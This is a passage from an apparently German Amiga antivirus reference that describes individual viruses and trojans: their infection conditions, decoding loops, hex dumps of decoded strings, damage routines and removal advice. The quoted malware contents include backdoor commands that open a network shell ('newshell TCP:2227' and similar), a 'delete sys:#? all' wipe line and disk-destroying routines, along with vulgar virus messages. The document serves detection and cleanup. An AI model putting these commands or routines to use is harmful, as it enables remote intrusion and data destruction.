$DFF007 wird ein Libname z.B. expansion.library ausgelesen. Dieser Name wird um .library gekuerzt. Sollte er dann immer noch laenger als #14 sein, so wird weiter gekuerzt. Dieser Teil- name wird dann als VirusTaskName verwendet. Task wird erstellt (AddTask) TaskStack: #512 Prio: 0 Verbiegt $6c von bestimmten ProcessStrukturen (z.B. WB31) auf eigene TaskStruktur Wartet dann mit Wait auf DosBit Signal ($100) Hinweis1: Bei Tests ist es gelungen, das Teil mehrmals in der Taskliste auftauchen zu lassen (duerfte nicht sein) Hinweis2: VT versucht das Teil komplett aus der TaskWait-Liste zu entfernen. Bei meinen Tests ist das auch immer gut ge- gangen. Falls Sie Probleme bekommen (Maschine zeigt Guru), dann waere ich fuer eine Mitteilung dankbar. Allgemein sollten Sie ueberlegen, ob es nicht besser waere von einer schreibge- schuetzten AntiVirusDisk neu zu Booten. Vermehrungsbedingungen: - File ist noch nicht verseucht (eor.w d0,d1 cmp.w #$fab4,d1) - max. Filelaenge $20000 = #131072 Bytes - 3F3 wird gefunden - 3E9-Hunk wird gefunden - Medium validated - mind. #10 Block frei - Medium hat mind. #8000 Block (also keine Disk-Verseuchung) - die vier Bytes 0,"VIR" (auch klein) werden nicht gefunden - jsr -xy(a6) wird gefunden ( max. loop $7FFF ) wird ersetzt durch bsr Virus oder - jmp -xy(a6) wird gefunden ( max. loop $7FFF ) wird ersetzt durch bra Virus oder - einer der beiden Befehle steht genau am Ende des 1. Hunks. Dann wird NOPNOP geschrieben. VT versucht das Linkteil auszubauen. Aber: Bei dem NOP- Sonderfall ist es NICHT mehr moeglich festzustellen, ob der Ursprung jsr oder jmp war. VT nimmt JMP, da es in diesem Hunk ja nicht mehr weitergeht. Das Teil meldet sich nicht. Hinweis3: Falls Ihre HD sehr verseucht ist, dann beginnen Sie bitte mit dem C-Verz. (File-Speicher-File). Das haeufige Neueinlesen wird dadurch geringer. Hinweis4: Eine Syquest wurde in 20 Minuten total verseucht. Die Syquest hat dann beim Booten in der startup-sequence (assign usw.) mit dem Reboot-Req. abgebrochen. - SNK-Virus File siehe bei PHANTOM-Virus - SnoopDos1.6-Virus Einbruchsprogramm in AmiExpress Von der Definition kein Virus, da keine Vermehrungsroutine ge- funden wurde. gefunden in: SNOOPD16.LHA 35444 Snoopdos-Laenge: 11312 Bytes Orig.SnoopDos1.5 : 10540 Bytes Es wurde SD1.5 verwendet und ein neuer Hunk als 1. angehaengt. Die Hunkanzahl erhoeht sich von 3 auf 4. Der neue 1. Hunk ist codiert mit: loop: move.w #$2d1,d2 eor.b d2,(a2)+ dbf d2,loop Nach Decodierung ist zu lesen: 4ED46172 702E6C69 62726172 79004242 NOarp.library.BB 53004242 533A7573 65722E64 61746100 S.BBS:user.data. 4242533A 75736572 2E6B6579 7300002A BBS:user.keys..* 4242533A 4E6F6465 302F6C6F 676F6E2E BBS:Node0/logon. 74787400 44455854 45520000 00000000 txt.DEXTER...... 00000000 00000000 00000000 00000000 ................ 00000052 45545552 4E000000 3D3E2046 ...RETURN...=> F 414E5441 20434F4E 4E454354 20323030 ANTA CONNECT 200 31203C3D 00000000 3034392D 34333133 1 <=....049-4313 36333633 34000000 00FF0000 00005858 63634....y....XX 58585858 58585800 008F0013 007570CC XXXXXXX......upI Empfehlung: Virus-File loeschen , logon loeschen und Orig. SnoopDos neu aufspielen. Keine Gefahr fuer Amiga-Be- nutzer ohne Mailbox. VT erkennt File: 23.10.92 Hinweis 01.11.92: gelesen im FIDO-Netz Laut Eddy Carroll (Prg. von Snoopdos) gibt es auch ein echtes SnoopDos 1.6, das allerdings nicht offiziell ver- breitet wurde. Das echte SD1.6 (hab ich nicht) soll bei Aufruf von version den Versions-Text ausgeben. Mein Test: Das SnoopDos1.6-Virus enthaelt den Text NICHT. - SnoopDos-JEFF-Virus File Laenge: 15336 Bytes Von der Definition ein trojanisches Pferd Jeff Butonic entfernt: 11568 Bytes A4000/40 : nur ohne cache Mit Hunklab wurde an SnoopDos ein Jeff-Butonic V4.55 ge- linkt. (JEFF siehe oben) Ob das SnoopDos-File V1.9 echt ist, kann ich nicht ent- scheiden. Mir ist die Version 1.9 (mein Kenntnisstand: Aug.93) nicht bekannt. Es koennte also jemand die Versionsnummer mit einem Monitor erhoeht haben. SnoopDos ist aber sauber. ff84584f 4cdf4080 4e752456 45523a20 ..XOL.@.Nu$VER: 536e6f6f 70446f73 20312e39 20283132 SnoopDos 1.9 (12 2e30352e 39332900 50726f63 65737320 .05.93).Process 6e616d65 20202020 20202020 20204675 name Fu VT erkennt bei File-Test: SnoopDos-JEFF VT erkennt im Speicher : - Sie haben sich NICHT an die Anweisungen gehalten und SnoopDos NICHT abgeschaltet vor Benutzung von VT: "SnoopD.u.anderesPrg ist im Speicher" - Sie haben SnoopDos vorher abgeschaltet: "JEFF BUTONIC V4.55 ist im Speicher" - SnoopDos-Saddam-Virus File Laenge: 13776 Bytes Von der Definition ein trojanisches Pferd Saddam-Clone entfernt: 11568 Bytes Mit Hunklab wurde an SnoopDos ein Saddam-Clone-4711 ge- linkt. (Saddam-Clone siehe oben) Ob das SnoopDos-File V2.1 echt ist, kann ich nicht ent- scheiden. Aber unwahrscheinlich, da gleiche Laenge wie V1.9. Mir ist die Version 2.1 (mein Kenntnisstand: Aug.93) nicht bekannt. Es koennte also jemand die Versionsnummer mit einem Monitor erhoeht haben. SnoopDos ist aber sauber. 4e752456 45523a20 536e6f6f 70446f73 Nu$VER: SnoopDos 20322e31 20283232 2e30372e 39332900 2.1 (22.07.93). Verhalten: SnoopDos V2.1 hab ich bei verseuchtem File NIE auf dem Bild- schirm gesehen. KS2.04: Das File stuerzt mit GURU 3 ab und nach Tastatur-Reset ist der Speicher sauber. KS1.3: Das File wird geladen und dann tut sich NICHTS mehr. Snoop- Dos V2.1 ist bei mir nicht erschienen. Tastatureingaben erscheinen auf dem Bildschirm, werden aber nicht ausgefuehrt. UND JETZT KOMMT DAS SCHLIMME: Nach einem Tastatur-Reset arbeitet der SADDAM-Disk-Validator im Speicher (man erinnere sich: Saddam hat eine Cold-Reboot- Routine, die AUCH mit FastMem arbeitet). Das Kreset-Prg im Unterverzeichnis von VT-Schutz hilft aber auch dagegen. - SOFIA Virus BB GYROS-Clone s.o. - Sonja VIRUS BB KS2.04: NEIN Fordert trackdisk.device: JA BeginIo, KickTag, KickCheckSum Codiert mit Wert aus $DFF007 DecodierRoutine: eor.b d0,-(a1) Im Speicher findet man dann z.B.: 00007472 61636B64 69736B2E ..trackdisk. 64657669 63650014 49742773 20536F6E device..It's Son 6A612056 49525553 21212100 28632939 ja VIRUS!!!.(c)9 31206279 204D4300 1 by MC. Vermehrung: als BB Schaeden: Sobald eine Zaehlzelle den Wert $14 erreicht hat, wird eine Format-Routine aufgerufen. Formatiert wird Track 2, 4, 6 usw. (Mal was Neues). Dann wird nach Block #880 ein neuer Rootblock geschrieben. RootBlockAuszug: 1A0: 00000000 00000000 00000000 00000000 ................ 1B0: 14497427 7320536F 6E6A6120 56495255 .It's Sonja VIRU 1C0: 53212121 00286329 39312062 79204D43 S!!!.(c)91 by MC 1D0: 00000000 00000000 00000000 00000000 ................ Am Schluss wird nach $FC0000 (reset) gesprungen. Die Disk ist unbrauchbar. Es ist NICHTS mehr zu retten. Da der Disk- name durch das Byte 1B0 = $14 in der Laenge begrenzt wird, erfolgt die Ausgabe nur bis zum letzten ! . BootBlock-Erkennung mit VT getestet: 23.09.92 Speicher-Erkennung mit VT getestet : 23.09.92 - SPEEDER-Virus Zerstoerungsfile anderer und richtiger Name: Descriptor-Virus siehe oben - SPEEDUP-Inst. File Filename: SPEEDUP.EXE Laenge: 92576 Bytes Soll das Linkteil im Speicher verankern. Sehr viel Platz in diesem File ist Muell, der nie erreicht wird. Vt bietet Loeschen an. - SPEEDUP-Virus Link Der Name wurde von dem Installerteil uebernommen, da sich im Linkteil nichts angeboten hat. Verbogene Vektoren: LoadSeg und falls pmbsonline.lib vorhanden, -$78(dieser lib) Diese Lib kenne ich nicht. Also kann ich zu den Auswirkungen, keine Aussage treffen. Link hinter den ersten Hunk Fileverlaengerung immer #1244 Bytes Linkteil nicht codiert Im Linkteil ist zu lesen: 2a40d3fc ffffff6c 22510ca9 4afc4afd *@.....l"Q..J.J. ;..... ^^^^^^^^ 03d0706d 62736f6e 6c696e65 2e6c6962 ..pmbsonline.lib 72617279 0000646f 732e6c69 62726172 rary..dos.librar ;..... 00000000 00000000 7fde3ba3 000003f2 .........;..... ^^^^^^^^ Verankerung im Speicher: Ueber Loadseg Dabei wird ueberprueft, ob sich das Teil schon im Speicher (4afc4afd) befindet. FileLink: Das Teil enthaelt eine Zaehlzelle, damit nicht bei jedem LoadSeg-Aufruf ein Linkversuch unternommen wird. Test ob File schon verseucht (7fde3ba3) Medium validated Mind. 5 Block frei Filename enthaelt nicht "." Kein Test auf Filelaenge oder 3E9-Hunk Es wird im Original-Hunk ein Bra ($6000) gesucht. Dabei muss das BRA in einem Loop mind. $13+1 mal gefunden werden, sonst findet keine Veraenderung statt. Diese Bra darf nicht weiter als $7FFE vom Linkteilbeginn entfernt sein. Dieser BRA-Befehl wird dann mit BRA Virusteil ueberschrieben. VT bietet Ausbau an - Sphinx-BB SCA-Clone s.o. - SS Virus BB Cool immer $7C078 immer ab $7C000 Bei mir mit KS2.04 nach Reset kein neuboot von Disk. Unter KS1.3 werden nach dem Reset 2 Interrupts installiert. Nr. 3 = Ports = $7C1D6 = SS.install Nr. 5 = VERTB = $7C1F8 = SS.greetings VT entfernt beim loeschen die Namen und setzt die Codezeiger auf 0 mit RemIntServer. Also keine Gefahr mehr. vgl. VT = Listen = IntVec Sobald die Zaehlzelle den Wert #$500 erreicht hat wird eine Graphikroutine angesprungen: schwarzer Hintergrund, helle Schrift Hakenkreuz,SS-Rune,Hakenkreuz und dann your computer is infected by SS-Virus! Danach ist ein Reset notwendig, da das VirusPrg. sich in einer Endlosschleife befindet. Der BB ist codiert mit eor.l d0,(a0)+ Von der Definition handelt es sich nicht um einen BB-Virus, da keine Vermehrungsroutine gefunden wurde. siehe auch MOSH, HEIL-Virus - STARCOMReturn-Virus BB richtig: The Return of STARCOM anderer Name: STARCOM 2 LAMER 4 -Clone siehe oben Es wurden nur Texte geaendert. Decodiert ist im Speicher zu lesen: 51c8fffc 4e757472 61636b64 69736b2e Q...Nutrackdisk. 64657669 63650054 68652052 65747572 device.The Retur 6e206f66 20535441 52434f4d 21212121 n of STARCOM!!!! 21bfabcd 00fc0a78 00fe9c3e 0000a4e8 !......x...>.... Eine Meisterleistung ist das Zerstoerungslangwort STC! . Es wurde dabei uebersehen, das das Original noch das Wort R! setzt oder war man nicht in der Lage, die Schleife zu aendern. Block: 350 53544321 52215354 43215221 53544321 STC!R!STC!R!STC! 52215354 43215221 53544321 52215354 R!STC!R!STC!R!ST ;...... 53544321 52215354 43215221 53544321 STC!R!STC!R!STC! 52215354 43215221 53544321 52212121 R!STC!R!STC!R!!! Sollte so ein Block in einem File liegen (BlockKette), so ist KEINE Rettung des Files moeglich. Tut mir leid. - STARCOM 1 Virus CCCP-Clone siehe oben also BB und Link KS1.3 ja KS2.04 ja Mehrfachlinks: ja Defekte Files: ja (Hunkstruktur defekt nur loeschen moeglich) Eine Meisterleistung: NUR der ASCII-Text wurde geaendert: 70004e75 53544152 434f4d21 21214df8 p.NuSTARCOM!!!M. - STARCOM 2 Virus siehe bei STARCOMReturn-Virus - STARCOM 3 Virus Byte Voyager 1 Clone siehe oben BB Eine Meisterleistung: NUR Text geaendert Decodiert ist zu lesen: fff64681 23410004 4cdf0303 4e751e54 ..F.#A..L...Nu.T 68652052 4556454e 4745206f 66205354 he REVENGE of ST 4152434f 4d202121 21000000 00000000 ARCOM !!!....... Schreibt auch in Bock 880 (nur bei Disk Root) Block: 880 01b0: 1e546865 20524556 454e4745 206f6620 .The REVENGE of 01c0: 53544152 434f4d20 21212100 00000000 STARCOM !!!..... Dies bewirkt bei Disk einen neuen Namen. Fordert Trackdisk.device NICHT Hinweis: Das Programm sichert den Bereich ab $7F000 NICHT. D.h. ein anderes Prg. z.B. VT kann genau an diese Stelle geladen werden. Da der verbogene KickTagzeiger in der Exec liegt und dieser Bereich ja geschuetzt ist, kann es zur Aus- gabe "unbekanntes Prg" oder "ResStruc ungerade" kommen. Mit 5 MB wurde dieses Virusteil im Speicher richtig erkannt, aber natuerlich bleibt unter KS1.3 bei dieser Speichergroesse, nach einem RESET das Prg. nicht erhalten und eine Vermehrung ist ueber DoIo nicht moeglich. - STARCOM 4 Virus BB LAMER 6 -Clone siehe oben Es wurden nur Texte geaendert. Decodiert ist im Speicher zu lesen: 74726163 6b646973 6b2e6465 76696365 trackdisk.device 00412074 6f756368 206f6620 53544152 .A touch of STAR 434f4d20 76697275 73212000 b800abcd COM virus! ..... Eine Meisterleistung ist das Zerstoerungslangwort STC! . Es wurde dabei uebersehen, das das Original noch das Wort R! setzt oder war man nicht in der Lage, die Schleife zu aendern. Block: 480 53544321 52215354 43215221 53544321 STC!R!STC!R!STC! 52215354 43215221 53544321 52215354 R!STC!R!STC!R!ST ;...... 53544321 52215354 43215221 53544321 STC!R!STC!R!STC! 52215354 43215221 53544321 52212121 R!STC!R!STC!R!!! Sollte so ein Block in einem File liegen (BlockKette), so ist KEINE Rettung des Files moeglich. Tut mir leid. - STARCOM 5 Virus BB boot-aids Virus Clone siehe oben Im BB und Speicher ist uncodiert zu lesen: 74726163 6b646973 6b2e6465 76696365 trackdisk.device 00005468 65205354 4152434f 4d204176 ..The STARCOM Av 656e6765 7220312e 30302021 00010000 enger 1.00 !.... Vermehrung: BB Schaeden: soll STC!aw in einen Block schreiben und damit das File unbrauchbar machen. KEINE Rettung moeglich. Besonderheit: In Boot-aids existiert eine Routine: cmpi.b #8,3(a0) bne.s $FEEF6 Dies bewirkt, dass nur Datenbloecke zerstoert werden koen- nen. Diese Routine wird bei Starcom 5 abgeschaltet, da bne.s durch ein NOP ersetzt wurde. - STARCOM 6 Virus BB Forpib-Clone siehe oben Eine Meisterleistung: nur Text geaendert im BB. 2020202a 2a2a2054 68652053 74617263 *** The Starc 6f6d2042 4c41434b 4f555421 20286329 om BLACKOUT! (c) 20313939 33202a2a 2a202020 20202020 1993 *** - STARFIRE/NorthStar 1 anderer Name BlackStar Cool, DoIo, im Speicher immer ab $7ec00, VersionsNr: 1 testet nicht auf SystemZ, nur auf SCA, ByteBandit = DisplayAlert Vermehrung: ueber BB Im BB lesbar: Virus detected on this disk usw. Reset,WriteProt OFF (bei NorthStar2 nicht vorhanden) Clones: East-Star - STARFIRE/NorthStar 2 = OldNorthStar ???? Cool, DoIo, im Speicher immer ab $7ec00, VersionsNr: 2 testet auf SCA, ByteBandit, SystemZ, NorthStar1, Folge=DisplayAlert Vermehrung: ueber BB Im BB lesbar: VIRUS detected on this disk usw. My AntiVirus is better! (bei NorthStar1 nicht vorhanden) Clones: z.B. Payday.BB - Starfire2 nur Block 0, sehr viel Text: The Virusbusters North Star Es ist kein Virus. - STARLIGHT File 2600 BRET HAWNES - Clone (siehe oben) KS2.04 : ja Laenge 8 Bytes weniger als Original, weil 03EC-Hunk ent- fernt wurde. Vermehrt sich das Teil, so ist die Laenge wieder 2608, da der 03EC-Hunk vom Virus angelegt wird. Wird von VT nur als Bret-Virus erkannt. Der lesbare Text (nicht der codierte) wurde geaendert. Am Fileanfang: 0000027D 60000018 53544152 4C494748 ...}`...STARLIGH 54203120 50524F44 55435449 4F4E2C79 T 1 PRODUCTION,y Am Fileende: F9526100 FED66000 FA02444F 20594F55 .DO YOU 204C494B 45204D59 20464952 53542056 LIKE MY FIRST V 49525553 203F2044 4F4E4520 4259204D IRUS ? DONE BY M 43444A2D 4444454E 49545921 20323130 CDJ-DDENITY! 210 32393000 00000000 000003F2 000003EB 290.... Wird vielleicht von anderen AntivirusPrg als Starlight - Virus erkannt. VT bleibt bei BRET HAWNES. - STARLIGHT BB Warhawk-Clone s.u. Nur Text geaendert. - STARLIGHT II BB MicroSystems-Clone s.o. Nur Text geaendert. - STD-Crabs1-Install Installer Archivename: mdlx09c.lha (Fremdaussage, hab ich nicht) Filename: MiamiDx.beta 439724 Bytes Warum Installer - Zerstoerungs-NOP fehlt - Linkteil ist kuerzer als nach Linkcode (mind. C1) moeglich - Linkteil wird nicht ueber NOP erreicht, sondern mit BRA.L gleich am Fileanfang angesprungen. Loeschen Sie bitte das Teil Rest siehe STD-Crabs1-LVirus Nachtrag 99-02-09: Erschienen ist MiamiDx09d.beta - STD-Crabs1-LVirus Linkvirus Fileverlaengerung: #772-832 Bytes Nicht Resetfest Ab KS2.04 Verbogene Vektoren: LoadSeg Zerstoerung: In Abhaengigkeit von $DFF009 wird ein NOP in das File geschrieben. Da Ursprungswert und -Stelle NICHT gerettet werden, ist ein Ausbau NICHT sinnvoll. Einige ver- seuchte Files laufen. Die Mehrheit erzeugt einen Guru. VT bietet nur Loeschen an. dir vorher nachher 0f8: 70012b40 fe44602c p.+@.D`, 0f8: 70012b40 fe444e71 p.+@.DNq ^^^^ ^^^^ delete vorher nachher 080: 2c4a4eae fce22f40 ,JN.../@ 080: 4e714eae fce22f40 NqN.../@ ^^^^ ^^^^ Decodiert ist im Linkteil zu lesen: 536e 6f6f7044 SnoopD 6f732053 7570706f 72742050 726f6365 os Support Proce 73730053 54442070 72657365 6e747320 ss.STD presents 2d2d2d20 43726162 73202331 202d2049 --- Crabs #1 - I 74636879 20596574 3f00 tchy Yet?. Speicherverankerung: - FindTask verbogen - Ende - Examine verbogen - Ende - SnoopDos im Speicher - CCR wird veraendert - Loadseg wird verbogen Linkvorgang: - mit LoadSeg hinter den 1. Hunk - Laenge variabel in Abhaengigkeit von einer Zelle, die immer ihren Wert aendert (Addition) - Codierung immer neu mit EOR und dieser Zelle mit Wertaenderung - Findtask nicht veraendert - Examine nicht veraendert - Filename enthaelt nicht "." oder "-" - Medium validated - 3 Block frei - File groesser #1024 Bytes - File kleiner KEINE Grenze - Suche nach RTS nur im letzten Langwort des 1.Hunks und Ersetzen durch NOP - In Abhaengigkeit von $DFF009 ein NOP in den 1.Hunk schreiben. - FileDate zurueckschreiben Empfehlung: Falls Sie gelinkte Files finden und Originalfiles zurueckspielen muessen. VTprefs/Filetest-Requester nach df0:test Klicke alle Requester. Sie haben danach eine Liste mit allen Files, die Sie neu aufspielen muessen. VT sollte das Teil am File und im Speicher finden. - STD-Vag1-Install Installer Filename: CED417 #169872 Bytes Springt vom Fileanfang in das Linkteil Linkteil ist mit EOR codiert Linkteil soll an c:mount gelinkt werden (nur an dieses File) Loeschen Sie bitte das CED417-File Ein sauberer Ausbau ist NICHT moeglich, da der Originalzu- stand am Fileanfang mir unbekannt ist. Rest siehe STD-Vag1-Trojan - STD-Vag1-Trojan Fileverlaengerung: immer #800 Bytes Filename: nur c:mount Nicht Resetfest Ab KS2.04 Verbogene Vektoren: LoadSeg Decodiert ist im Linkteil zu lesen: 536e 6f6f7044 6f732053 SnoopDos S 7570706f 72742050 726f6365 73730043 upport Process.C 3a4d6f75 6e740072 756e203e 4e494c3a :Mount.run >NIL: 206e6577 7368656c 6c205443 50003232 newshell TCP.22 32370000 53544420 70726573 656e7473 27..STD presents 202d2056 6167696e 69746973 20233120 - Vaginitis #1 2d2d2064 69727479 206d6f6c 6521 -- dirty mole! Speicherverankerung: - FindTask veraendert - Ende - Examine veraendert - Ende - SnoopDos im Speicher - CCR wird veraendert - Loadseg wird verbogen Linkvorgang: - hinter den 1. Hunk von mount - Codierung mit EOR - Findtask nicht veraendert - Examine nicht veraendert - Suche nach RTS nur im letzten Langwort des 1.Hunks und Ersetzen durch NOP (dadurch kein "100% richtiger" Aus- bau moeglich vgl. auch Fungus) - FileDate zurueckschreiben Schaden: - Suche TCP in DosList - Setze hinter TCP (s.o.) einen Doppelpunkt - DosExecute run >NIL: ..... - Es soll also wahrscheinlich ein Fremdzugriff auf den Rechner ermoeglicht werden Vgl. auch alle anderen STD-Varianten und Fungus - STD-Vag2-Install Installer Filename: rexxkuang11.library 0.36 L: #31172 Bytes Springt im File mit BRA in das Linkteil Linkteil ist mit EOR codiert Linkteil soll an c:mount gelinkt werden (nur an dieses File) Loeschen Sie bitte die Lib Ein sauberer Ausbau ist NICHT moeglich, da der Originalzu- stand des Files mir unbekannt ist. Rest siehe STD-Vag2-Trojan - STD-Vag2-Trojan Fileverlaengerung: immer #800 Bytes Filename: nur c:mount Nicht Resetfest Ab KS2.04 Verbogene Vektoren: LoadSeg Decodiert ist im Linkteil zu lesen: 536e6f6f 70446f73 SnoopDos 20537570 706f7274 2050726f 63657373 Support Process 00433a4d 6f756e74 0072756e 203e4e49 .C:Mount.run >NI 4c3a206e 65777368 656c6c20 54435000 L: newshell TCP. 32353531 00005354 44207072 6573656e 2551..STD presen 7473202d 20566167 696e6974 69732023 ts - Vaginitis # 32202d2d 2066696c 74687920 77686f72 2 -- filthy whor 6521 e! Speicherverankerung: - FindTask veraendert - Ende - Examine veraendert - Ende - SnoopDos im Speicher - CCR wird veraendert - Loadseg wird verbogen Linkvorgang: - hinter den 1. Hunk von mount - Codierung mit EOR - Findtask nicht veraendert - Examine nicht veraendert - Suche nach RTS nur im letzten Langwort des 1.Hunks und Ersetzen durch NOP (dadurch kein "100% richtiger" Aus- bau moeglich vgl. auch Fungus) - FileDate zurueckschreiben Schaden: - Suche TCP in DosList - Setze hinter TCP (s.o.) einen Doppelpunkt - DosExecute run >NIL: ..... - Es soll also wahrscheinlich ein Fremdzugriff auf den Rechner ermoeglicht werden Vgl. auch alle anderen STD-Varianten und Fungus Zum Nachdenken: eine neuere Trojanvariante (3) haengt an einer aelteren Libversion (0.27) und umgekehrt ???? - STD-Vag3-Trojan Filename: rexxkuang11.library 0.27 L: #26532 Bytes Nicht Resetfest Ab KS2.04 Verbogene Vektoren: KEINE Vermehrung: Nein Decodiert mit EOR ist im Trojanteil zu lesen: 52554e20 3e4e494c 3a206e65 RUN >NIL: ne 77736865 6c6c2074 63703a32 33333300 wshell tcp:2333. ;... 53544420 70726573 STD pres 656e7473 20566167 696e6974 69732023 ents Vaginitis # 33202d2d 2d206469 6420796f 75206669 3 --- did you fi 6e642031 20616e64 20322079 65743f00 nd 1 and 2 yet?. Springt im File mit BRA in das Trojanteil Schaden: - Holt sich die DosBase wahrscheinlich aus einer Lib - Suche TCP in DosList falls nein Ende - DosExecute run >NIL: ..... - Es soll also wahrscheinlich ein Fremdzugriff auf den Rechner ermoeglicht werden Loeschen Sie bitte die Lib Vgl. auch alle anderen STD-Varianten Zum Nachdenken: eine neuere Trojanvariante (3) haengt an einer aelteren Libversion (0.27) und umgekehrt ???? - Stockmarket-BBS Filename: stock.rexx Laenge: 74576 Bytes Nach meiner Meinung fuer Nicht-Mailbox-Spieler ungefaehrlich. VT bietet nur loeschen an. Schaeden: Kann ich nicht nachvollziehen. Deshalb ein Textauszug OHNE Garantie: ----------------------------------------------------------------------- WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING ----------------------------------------------------------------------- I Just wanna inform all of you /X sysops, than a file -L-STOCK.LHA (a door game for /X) has a fucking BACKDOOR !!!! If you enter BUY option and write a number highest than possible (for example a number 20 or 100 or any more than allowed than your Upload Status will be restored to 0 !!!!! 0 bytes !!!!! All your uploads will be canceled! - Strange Atmosphere Installer Bekannte Filenamen: Typ A : db 3.03 Laenge: 76676 Bytes Im File ist zu lesen: 00006462 2076332e 303320a9 31393936 ..db v3.03 .1996 20446176 69642045 6b686f6c 6d2c2044 David Ekholm, D Ich gehe davon aus, dass es diese Version 3.03 im Original nicht gibt. Typ B : IconX Laenge: 6288 Bytes Im File ist zu lesen: 4e750024 5645523a 2069636f 6e782033 Nu.$VER: iconx 3 392e3820 2832302e 312e3932 2900646f 9.8 (20.1.92).do Ich gehe davon aus, dass es diese Version 39.8 im Original nicht gibt. VT bietet Loeschen an. Ablauf: Suche nach SnoopDos. (Taskname wird erst im Code zusammenge- setzt) . Falls gefunden ->Ende. Schreibe C:Assign Laenge: 4488 Bytes Im File ist zu lesen: 45532f53 00245645 523a2061 73736967 ES/S.$VER: assig 6e203337 2e352028 32302e35 2e393229 n 37.5 (20.5.92) Diese Versionsnummer kenne ich nicht. Sie sollten dieses assign-File loeschen und ein Original neu aufspielen. Da assign fast in jeder startup-sequence vorkommt, wird das Teil nach jedem Reset gestartet. VT bietet loeschen an. Typ C : assign Laenge: 4488 Bytes - Strange Atmosphere Linkvirus Ab KS 2.04 (Test auf $25) Verbogener Vektor: LoadSeg Nicht resetfest Fileverlaengerung hinter den 1.Hunk: 1232 Bytes Ueberlaeuft 3E8, 3F0, 3F1-Hunks. Decodiert ist im Linkteil zu lesen: 2d2b2a20 53747261 6e676520 41746d6f -+* Strange Atmo 73706865 7265205b 674f4f64 5d202a2b sphere [gOOd] *+ gOOd kann im Programm durch eViL ersetzt werden. VT versucht den Ausbau. Ablauf: Test auf Medium ok 4 Block frei File ausfuehrbar (3F3) 3E9-Hunk wird gefunden. Erste Hunklaenge stimmt mit $14-Fileeintrag ueberein. File groesser als #2600 Bytes. File kleiner (In Abhaengigkeit von Speichermediumgroesse) als #30000 Bytes oder #290000 Bytes. File beginnt nicht mit "v" oder "V". Der zweite Test auf ".l" im Filenamen (library) funktioniert bei meinen Tests nicht. Das Library-Verzeichnis wurde ver- seucht (mit Proz.68030) . Test auf File noch nicht befallen. Verseuchung: Das Teil linkt sich hinter den ersten Hunk. Es wird nach $4EAE (jsr -xyz(a6) gesucht. Dies darf nicht mehr als $7FF0 vom Hunkende entfernt sein. Wird ersetzt durch $4EBAabcd (jsr Virusbeginn). Schaeden in Abhaengigkeit von $DFF006 und/oder einer Zaehlzelle: - Linkversuch siehe oben - Das File wird auf #10 Bytes gekuerzt und mit Muell gefuellt. Da ist NICHTS mehr zu retten. - In das File sollen ENDLOS immer wieder #10 Bytes geschrieben werden. Da ist nichts mehr zu retten. - Cool-Vektor wird verbogen, ein Reset ausgefuehrt UND DoIo-Vektor verbogen. Das trackdisk.device wird NICHT gefordert. Es sollen in einer ENDLOS-Schleife immer wieder #1024 Bytes Muell Beginn mit Block 0 (BB ODER RIGID !!!!!) geschrieben werden. Aber Sie haben doch bestimmt Zylinder 0 Ihrer Festplatte auf Diskette gesichert. Und ein verbogener DoIo-Vektor mahnt Sie sicherlich auch zur Vorsicht. Das kennen Sie ja von "alten" BB-Viren. - "Nach einem Warmstart hatte ich eine erschreckende Schwarz-Rot- Goldene Fahne auf meinem Monitor." (Hinweis von M. R. Danke!!!) Stimmt. Diese Routine ist im Linkteil vorhanden, wurde aber bei meinen Tests nicht ausgeloest, da die Bedingungen (s.o) zufaellig nie gestimmt haben. Allgemeine Hinweise: (fuer SEHR STARKE Verseuchung) Ueberlegen Sie bitte, ob es nicht sinnvoller ist, einzelne Unter- verzeichnisse ( z.B. c ) voellig neu auf die Festplatte aufzu- spielen. Falls Sie unbedingt eine Rettung durchfuehren muessen, dann gehen Sie bitte mit VT-Filerequester in die einzelnen Unterverzeichnisse Ihrer Festplatte. VT bewegt sich dann nur in dem gewaehlten Unter- verzeichnis und arbeitet schneller. Sp->File->SP und dann Unterver- zeichnis waehlen. Danach DirFTest. - Suntronic Cool, DoIo, nur Kick1.2 da absolute ROM-Einspruenge Vermehrung ueber BB , immer $7FA00 Suntronic-Text im BB sichtbar - SuperBoy Cool, im Prg DoIo, im Speicher immer ab $7EC00 Vermehrung ueber BB Alertmeldung mit .... The Famous SuperBoy - Surprise-Trojan Zerstoerungsfile Laenge ungepackt: 39296 Bytes Name uebernommen. Soll sich nach Fremdaussagen auf eine Party beziehen, auf der das Teil das erste Mal aufgetaucht ist. SOFORT loeschen Keine verbogenen Vektoren Verwendet Exec-Sprungbefehle, die erst ab KS2.04 existieren. Das File besteht aus der Zerstoerungsroutine und um eine File- laenge zu erreichen, die ein Demo glaubhaft macht aus 98% wwwww-Muell. s.u. Schaden: Sucht nach scsi.device Unit 0 UND 1. Falls gefunden, werden $800 (= 4 Block) in den Rigid-Bereich geschrieben. Sie sollten in diesem Fall ein Backup des Rigid- bereichs ihrer Festplatte haben. Im File und spaeter im Rigid-Bereich ist zu lesen: fd6c4e75 5244534b 00000040 c9699f9f .lNuRDSK...@.i.. ;..... ^^^^ Rigid-Beginn 00000000 5375636b 204d6520 4f726761 ....Suck Me Orga 6e697a65 72732020 20202020 20202020 nizers ;..... 00000000 50415254 00000040 b3d956c7 ....PART...@..V. 00000007 ffffffff 00000001 00000000 ................ 00000000 00000000 07467563 6b4f6666 .........FuckOff 45000000 00000000 00000000 00000000 E............... ;..... 00000000 73637369 2e646576 69636500 ....scsi.device. 77777777 77777777 77777777 77777777 wwwwwwwwwwwwwwww - SWiFTER-Trojan File Zerstoerung Laenge gepackt: 106496 Laenge entpackt: 215448 Keine verbogenen Vektoren Keine Vermehrung VT bietet Loeschen an Nach FileID: ein Spiel In Wirklichkeit: Vor ein IFF-Bild wurden einige Dos-Routinen gesetzt. Diese Dos-Routinen haben Zerstoerungsfunktionen. Im entpackten File ist zu lesen: 733a7374 61727475 s:startu 702d7365 7175656e 63650063 3a646972 p-sequence.c:dir 00633a63 6f707900 633a6564 00633a64 .c:copy.c:ed.c:d 656c6574 6500636f 70792030 30332e64 elete.copy 003.d 61742073 3a007265 6e616d65 20733a30 at s:.rename s:0 30332e64 61742073 3a737461 72747570 03.dat s:startup 2d736571 75656e63 65003030 312e6461 -sequence.001.da 74204b45 594d4150 533a2022 22003030 t KEYMAPS: "".00 322e6461 74203030 302e6461 7400464f 2.dat 000.dat.FO Es wird also eine neue startup-s. geschrieben, die eine Delete- Funktion enthaelt (wirksam erst nach Reset) L: 73 Bytes: 64656c65 74652073 79733a23 3f20616c delete sys:#? al 6c0a3b20 